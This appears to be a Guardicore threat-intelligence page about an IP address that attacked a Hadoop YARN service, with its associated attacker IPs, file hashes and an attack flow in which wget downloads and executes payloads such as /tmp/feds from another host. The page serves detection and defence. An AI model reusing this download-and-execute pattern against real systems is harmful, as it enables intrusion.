IP Address: 80.211.173.234Previously Malicious

Weekly Summary

Browse or download a weekly review of our cyber threat intelligence data and gain more insight to help protect your network

Top Threats

Cyber Threat Intelligence

Discover Malicious IPs and Domains with Guardicore Cyber Threat Feed

IP Address:
80.211.173.234​
Previously Malicious

This IP address attempted an attack on a machine protected by Guardicore Centra

Threat Information

Role

Attacker, Scanner

Services Targeted

HadoopYARN

Tags

HTTP HadoopYARN Malicious File IDS - Web Application Attack Outgoing Connection Download and Allow Execution Download and Execute Download File Inbound HTTP Request

Associated Attack Servers

aruba.it

80.211.69.84 104.40.157.159 52.170.223.233 40.117.44.182 104.46.40.157 13.92.114.106 52.179.23.37 52.174.33.6 13.94.200.48 23.101.129.153 52.233.141.180 40.121.136.37 40.68.86.94 52.178.117.234 13.90.253.5 52.168.150.12 52.233.137.26 13.93.0.140 40.117.238.114 40.68.31.228 13.73.166.169 13.73.167.164 13.81.222.239 40.85.190.216 13.95.80.40 52.179.16.86 80.211.66.35 52.168.135.53 40.68.42.232 13.69.28.221

Basic Information

IP Address

80.211.173.234

Domain

-

ISP

Aruba S.p.A.

Country

Italy

WHOIS

Created Date

-

Updated Date

-

Organization

-

First seen in Guardicore Centra

2018-09-30

Last seen in Guardicore Centra

2018-10-07

What is Guardicore Centra
Guardicore Centra is a data center and cloud security solution that protects the organization's core assets, using flexible, quickly deployed and easy to understand micro-segmentation controls. Centra generates in-context security incidents, with details on attacker tools and techniques, that help IR teams prioritize incident investigation and reduce dwell time. Learn More

Attack Flow

Process /usr/bin/wget generated outgoing network traffic to: 80.211.66.35:80

Outgoing Connection

The file /tmp/mysql.sock.lock was downloaded and granted execution privileges

Process /tmp/feds generated outgoing network traffic to: 80.211.66.35:69

Outgoing Connection

The file /tmp/feds was downloaded and executed 4 times

Download and Execute

IDS detected Web Application Attack : 401TRG Generic Webshell Request - POST with wget in body

IDS - Web Application Attack

Connection was closed due to user inactivity

/tmp/feds was identified as malicious by YARA according to rules: 000 Common Rules

Malicious File

Associated Files

/tmp/feds

SHA256: a0d61a671e5f3fc32552b4934b56874f7207c19a7bf38b41e520cfbd795d3d50

111115 bytes

/tmp/feds

SHA256: acc9e920deb06ef49605068965b65db42fd0554f1f50769de6957e34a1e82927

48861 bytes

/tmp/yakuza.x86

SHA256: cc1e5af5ac9e134c29b61d95d523e296837de7f80140e27df13840172615c950

111115 bytes

/tmp/yakuza.x86

SHA256: 740403aae097ee11b4fc43e03bc5448c742803e35672b2131e038a7a05c73899

111115 bytes

/tmp/feds

SHA256: 61ece7b92b136267027b7fd2cc251cefe51c3aafc171a9d17d772d99cbfb653a

111115 bytes

/tmp/feds

SHA256: ee9d62dc3b359bcc035b7d64ef4651eb8f69577e35a87968591c5ee9a1cfc380

75421 bytes

/tmp/feds

SHA256: ecc407b433351cff5a9e077f503384f6878fdaf2d18c8f424ae778a0ab57de60

11677 bytes

/tmp/feds

SHA256: dc208ef8a2b3b306b18e0f5b068b3eed4da7b1f37d8b79bb71db42c23632502a

111115 bytes

Oops! - Do you see your IP here? Contact us at labs@guardicore.com to remove it from the Threat Intelligence data.

IP Address: 80.211.173.234​Previously Malicious